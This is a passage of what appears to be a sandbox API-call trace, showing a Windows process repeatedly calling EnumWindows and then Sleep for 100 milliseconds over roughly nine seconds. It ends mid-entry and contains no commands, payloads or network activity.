[0199.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.376] Sleep (dwMilliseconds=0x64) [0199.436] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.437] Sleep (dwMilliseconds=0x64) [0199.508] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.509] Sleep (dwMilliseconds=0x64) [0199.526] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.526] Sleep (dwMilliseconds=0x64) [0199.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.560] Sleep (dwMilliseconds=0x64) [0199.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.607] Sleep (dwMilliseconds=0x64) [0199.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.654] Sleep (dwMilliseconds=0x64) [0199.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.701] Sleep (dwMilliseconds=0x64) [0199.888] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.889] Sleep (dwMilliseconds=0x64) [0199.924] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.924] Sleep (dwMilliseconds=0x64) [0199.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.935] Sleep (dwMilliseconds=0x64) [0199.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.982] Sleep (dwMilliseconds=0x64) [0200.007] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.007] Sleep (dwMilliseconds=0x64) [0200.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.013] Sleep (dwMilliseconds=0x64) [0200.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.029] Sleep (dwMilliseconds=0x64) [0200.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.092] Sleep (dwMilliseconds=0x64) [0200.123] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.124] Sleep (dwMilliseconds=0x64) [0200.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.138] Sleep (dwMilliseconds=0x64) [0200.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.154] Sleep (dwMilliseconds=0x64) [0200.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.201] Sleep (dwMilliseconds=0x64) [0200.247] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.248] Sleep (dwMilliseconds=0x64) [0200.290] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.290] Sleep (dwMilliseconds=0x64) [0200.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.294] Sleep (dwMilliseconds=0x64) [0200.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.342] Sleep (dwMilliseconds=0x64) [0200.373] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.374] Sleep (dwMilliseconds=0x64) [0200.388] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.389] Sleep (dwMilliseconds=0x64) [0200.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.404] Sleep (dwMilliseconds=0x64) [0200.451] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.452] Sleep (dwMilliseconds=0x64) [0200.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.484] Sleep (dwMilliseconds=0x64) [0200.496] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.497] Sleep (dwMilliseconds=0x64) [0200.513] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.514] Sleep (dwMilliseconds=0x64) [0200.560] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.561] Sleep (dwMilliseconds=0x64) [0200.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.607] Sleep (dwMilliseconds=0x64) [0200.647] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.648] Sleep (dwMilliseconds=0x64) [0200.654] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.654] Sleep (dwMilliseconds=0x64) [0200.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.701] Sleep (dwMilliseconds=0x64) [0200.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.934] Sleep (dwMilliseconds=0x64) [0200.996] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0200.997] Sleep (dwMilliseconds=0x64) [0201.045] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.046] Sleep (dwMilliseconds=0x64) [0201.078] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.079] Sleep (dwMilliseconds=0x64) [0201.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.091] Sleep (dwMilliseconds=0x64) [0201.117] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.118] Sleep (dwMilliseconds=0x64) [0201.169] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.170] Sleep (dwMilliseconds=0x64) [0201.206] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.206] Sleep (dwMilliseconds=0x64) [0201.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.217] Sleep (dwMilliseconds=0x64) [0201.279] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.280] Sleep (dwMilliseconds=0x64) [0201.326] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.327] Sleep (dwMilliseconds=0x64) [0201.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.388] Sleep (dwMilliseconds=0x64) [0201.432] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.433] Sleep (dwMilliseconds=0x64) [0201.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.482] Sleep (dwMilliseconds=0x64) [0201.521] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.522] Sleep (dwMilliseconds=0x64) [0201.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.529] Sleep (dwMilliseconds=0x64) [0201.576] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.577] Sleep (dwMilliseconds=0x64) [0201.615] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.616] Sleep (dwMilliseconds=0x64) [0201.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.622] Sleep (dwMilliseconds=0x64) [0201.670] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.671] Sleep (dwMilliseconds=0x64) [0201.707] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.708] Sleep (dwMilliseconds=0x64) [0201.721] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.722] Sleep (dwMilliseconds=0x64) [0201.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.735] Sleep (dwMilliseconds=0x64) [0201.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.782] Sleep (dwMilliseconds=0x64) [0201.854] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.855] Sleep (dwMilliseconds=0x64) [0201.906] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.907] Sleep (dwMilliseconds=0x64) [0201.940] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.941] Sleep (dwMilliseconds=0x64) [0201.952] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.953] Sleep (dwMilliseconds=0x64) [0201.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0201.966] Sleep (dwMilliseconds=0x64) [0202.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.016] Sleep (dwMilliseconds=0x64) [0202.042] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.044] Sleep (dwMilliseconds=0x64) [0202.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.060] Sleep (dwMilliseconds=0x64) [0202.120] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.121] Sleep (dwMilliseconds=0x64) [0202.151] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.151] Sleep (dwMilliseconds=0x64) [0202.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.172] Sleep (dwMilliseconds=0x64) [0202.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.219] Sleep (dwMilliseconds=0x64) [0202.244] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.245] Sleep (dwMilliseconds=0x64) [0202.266] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.267] Sleep (dwMilliseconds=0x64) [0202.329] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.330] Sleep (dwMilliseconds=0x64) [0202.354] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.355] Sleep (dwMilliseconds=0x64) [0202.376] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.376] Sleep (dwMilliseconds=0x64) [0202.420] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.422] Sleep (dwMilliseconds=0x64) [0202.457] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.458] Sleep (dwMilliseconds=0x64) [0202.468] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.469] Sleep (dwMilliseconds=0x64) [0202.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.485] Sleep (dwMilliseconds=0x64) [0202.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.545] Sleep (dwMilliseconds=0x64) [0202.591] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.595] Sleep (dwMilliseconds=0x64) [0202.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.654] Sleep (dwMilliseconds=0x64) [0202.703] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.704] Sleep (dwMilliseconds=0x64) [0202.720] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.721] Sleep (dwMilliseconds=0x64) [0202.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.734] Sleep (dwMilliseconds=0x64) [0202.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.766] Sleep (dwMilliseconds=0x64) [0202.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.813] Sleep (dwMilliseconds=0x64) [0202.873] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.874] Sleep (dwMilliseconds=0x64) [0202.891] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.892] Sleep (dwMilliseconds=0x64) [0202.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.938] Sleep (dwMilliseconds=0x64) [0202.962] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.963] Sleep (dwMilliseconds=0x64) [0202.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.965] Sleep (dwMilliseconds=0x64) [0202.983] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0202.984] Sleep (dwMilliseconds=0x64) [0203.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.032] Sleep (dwMilliseconds=0x64) [0203.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.060] Sleep (dwMilliseconds=0x64) [0203.078] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.078] Sleep (dwMilliseconds=0x64) [0203.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.158] Sleep (dwMilliseconds=0x64) [0203.202] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.202] Sleep (dwMilliseconds=0x64) [0203.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.219] Sleep (dwMilliseconds=0x64) [0203.268] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.269] Sleep (dwMilliseconds=0x64) [0203.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.313] Sleep (dwMilliseconds=0x64) [0203.333] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.334] Sleep (dwMilliseconds=0x64) [0203.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.341] Sleep (dwMilliseconds=0x64) [0203.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.376] Sleep (dwMilliseconds=0x64) [0203.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.423] Sleep (dwMilliseconds=0x64) [0203.443] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.444] Sleep (dwMilliseconds=0x64) [0203.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.450] Sleep (dwMilliseconds=0x64) [0203.482] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.483] Sleep (dwMilliseconds=0x64) [0203.521] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.522] Sleep (dwMilliseconds=0x64) [0203.527] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.528] Sleep (dwMilliseconds=0x64) [0203.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.576] Sleep (dwMilliseconds=0x64) [0203.595] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.596] Sleep (dwMilliseconds=0x64) [0203.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.607] Sleep (dwMilliseconds=0x64) [0203.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.622] Sleep (dwMilliseconds=0x64) [0203.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.752] Sleep (dwMilliseconds=0x64) [0203.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.782] Sleep (dwMilliseconds=0x64) [0203.803] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.807] Sleep (dwMilliseconds=0x64) [0203.845] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.846] Sleep (dwMilliseconds=0x64) [0203.907] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.908] Sleep (dwMilliseconds=0x64) [0203.925] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.926] Sleep (dwMilliseconds=0x64) [0203.937] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.937] Sleep (dwMilliseconds=0x64) [0203.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0203.969] Sleep (dwMilliseconds=0x64) [0204.016] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.017] Sleep (dwMilliseconds=0x64) [0204.038] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.039] Sleep (dwMilliseconds=0x64) [0204.043] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.044] Sleep (dwMilliseconds=0x64) [0204.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.060] Sleep (dwMilliseconds=0x64) [0204.116] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.118] Sleep (dwMilliseconds=0x64) [0204.151] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.152] Sleep (dwMilliseconds=0x64) [0204.170] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.171] Sleep (dwMilliseconds=0x64) [0204.253] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.254] Sleep (dwMilliseconds=0x64) [0204.289] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.290] Sleep (dwMilliseconds=0x64) [0204.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.294] Sleep (dwMilliseconds=0x64) [0204.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.310] Sleep (dwMilliseconds=0x64) [0204.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.357] Sleep (dwMilliseconds=0x64) [0204.379] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.380] Sleep (dwMilliseconds=0x64) [0204.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.387] Sleep (dwMilliseconds=0x64) [0204.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.404] Sleep (dwMilliseconds=0x64) [0204.451] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.452] Sleep (dwMilliseconds=0x64) [0204.475] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.476] Sleep (dwMilliseconds=0x64) [0204.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.481] Sleep (dwMilliseconds=0x64) [0204.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.513] Sleep (dwMilliseconds=0x64) [0204.560] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.562] Sleep (dwMilliseconds=0x64) [0204.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.607] Sleep (dwMilliseconds=0x64) [0204.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.654] Sleep (dwMilliseconds=0x64) [0204.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.718] Sleep (dwMilliseconds=0x64) [0204.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.750] Sleep (dwMilliseconds=0x64) [0204.770] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.771] Sleep (dwMilliseconds=0x64) [0204.777] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.778] Sleep (dwMilliseconds=0x64) [0204.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.951] Sleep (dwMilliseconds=0x64) [0204.998] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0204.999] Sleep (dwMilliseconds=0x64) [0205.047] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.048] Sleep (dwMilliseconds=0x64) [0205.083] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.083] Sleep (dwMilliseconds=0x64) [0205.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.091] Sleep (dwMilliseconds=0x64) [0205.115] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.116] Sleep (dwMilliseconds=0x64) [0205.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.172] Sleep (dwMilliseconds=0x64) [0205.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.218] Sleep (dwMilliseconds=0x64) [0205.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.266] Sleep (dwMilliseconds=0x64) [0205.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.313] Sleep (dwMilliseconds=0x64) [0205.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.357] Sleep (dwMilliseconds=0x64) [0205.418] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.419] Sleep (dwMilliseconds=0x64) [0205.460] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.461] Sleep (dwMilliseconds=0x64) [0205.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.465] Sleep (dwMilliseconds=0x64) [0205.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.482] Sleep (dwMilliseconds=0x64) [0205.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.545] Sleep (dwMilliseconds=0x64) [0205.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.591] Sleep (dwMilliseconds=0x64) [0205.632] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.632] Sleep (dwMilliseconds=0x64) [0205.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.638] Sleep (dwMilliseconds=0x64) [0205.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.685] Sleep (dwMilliseconds=0x64) [0205.707] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.707] Sleep (dwMilliseconds=0x64) [0205.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.716] Sleep (dwMilliseconds=0x64) [0205.732] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.733] Sleep (dwMilliseconds=0x64) [0205.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.779] Sleep (dwMilliseconds=0x64) [0205.811] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.812] Sleep (dwMilliseconds=0x64) [0205.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.825] Sleep (dwMilliseconds=0x64) [0205.907] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.908] Sleep (dwMilliseconds=0x64) [0205.956] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0205.957] Sleep (dwMilliseconds=0x64) [0206.046] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.047] Sleep (dwMilliseconds=0x64) [0206.093] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.094] Sleep (dwMilliseconds=0x64) [0206.156] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.157] Sleep (dwMilliseconds=0x64) [0206.240] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.241] Sleep (dwMilliseconds=0x64) [0206.247] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.248] Sleep (dwMilliseconds=0x64) [0206.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.312] Sleep (dwMilliseconds=0x64) [0206.349] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.350] Sleep (dwMilliseconds=0x64) [0206.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.359] Sleep (dwMilliseconds=0x64) [0206.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.404] Sleep (dwMilliseconds=0x64) [0206.427] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.427] Sleep (dwMilliseconds=0x64) [0206.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.434] Sleep (dwMilliseconds=0x64) [0206.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.451] Sleep (dwMilliseconds=0x64) [0206.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.497] Sleep (dwMilliseconds=0x64) [0206.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.544] Sleep (dwMilliseconds=0x64) [0206.582] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.582] Sleep (dwMilliseconds=0x64) [0206.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.591] Sleep (dwMilliseconds=0x64) [0206.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.638] Sleep (dwMilliseconds=0x64) [0206.659] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.660] Sleep (dwMilliseconds=0x64) [0206.668] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.669] Sleep (dwMilliseconds=0x64) [0206.685] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.686] Sleep (dwMilliseconds=0x64) [0206.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.732] Sleep (dwMilliseconds=0x64) [0206.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.779] Sleep (dwMilliseconds=0x64) [0206.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.826] Sleep (dwMilliseconds=0x64) [0206.888] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.891] Sleep (dwMilliseconds=0x64) [0206.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0206.970] Sleep (dwMilliseconds=0x64) [0207.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.032] Sleep (dwMilliseconds=0x64) [0207.069] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.069] Sleep (dwMilliseconds=0x64) [0207.074] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.075] Sleep (dwMilliseconds=0x64) [0207.096] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.097] Sleep (dwMilliseconds=0x64) [0207.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.156] Sleep (dwMilliseconds=0x64) [0207.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.173] Sleep (dwMilliseconds=0x64) [0207.186] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.187] Sleep (dwMilliseconds=0x64) [0207.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.218] Sleep (dwMilliseconds=0x64) [0207.264] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.265] Sleep (dwMilliseconds=0x64) [0207.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.328] Sleep (dwMilliseconds=0x64) [0207.374] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.375] Sleep (dwMilliseconds=0x64) [0207.436] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.437] Sleep (dwMilliseconds=0x64) [0207.478] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.479] Sleep (dwMilliseconds=0x64) [0207.482] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.482] Sleep (dwMilliseconds=0x64) [0207.496] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.497] Sleep (dwMilliseconds=0x64) [0207.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.545] Sleep (dwMilliseconds=0x64) [0207.564] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.565] Sleep (dwMilliseconds=0x64) [0207.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.575] Sleep (dwMilliseconds=0x64) [0207.610] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.611] Sleep (dwMilliseconds=0x64) [0207.652] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.653] Sleep (dwMilliseconds=0x64) [0207.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.716] Sleep (dwMilliseconds=0x64) [0207.755] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.755] Sleep (dwMilliseconds=0x64) [0207.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.767] Sleep (dwMilliseconds=0x64) [0207.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.781] Sleep (dwMilliseconds=0x64) [0207.920] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0207.920] Sleep (dwMilliseconds=0x64) [0208.003] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.004] Sleep (dwMilliseconds=0x64) [0208.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.093] Sleep (dwMilliseconds=0x64) [0208.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.169] Sleep (dwMilliseconds=0x64) [0208.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.265] Sleep (dwMilliseconds=0x64) [0208.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.357] Sleep (dwMilliseconds=0x64) [0208.517] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.518] Sleep (dwMilliseconds=0x64) [0208.579] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.580] Sleep (dwMilliseconds=0x64) [0208.607] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.610] Sleep (dwMilliseconds=0x64) [0208.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.622] Sleep (dwMilliseconds=0x64) [0208.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.640] Sleep (dwMilliseconds=0x64) [0208.686] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.687] Sleep (dwMilliseconds=0x64) [0208.708] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.708] Sleep (dwMilliseconds=0x64) [0208.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.716] Sleep (dwMilliseconds=0x64) [0208.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0208.734] Sleep 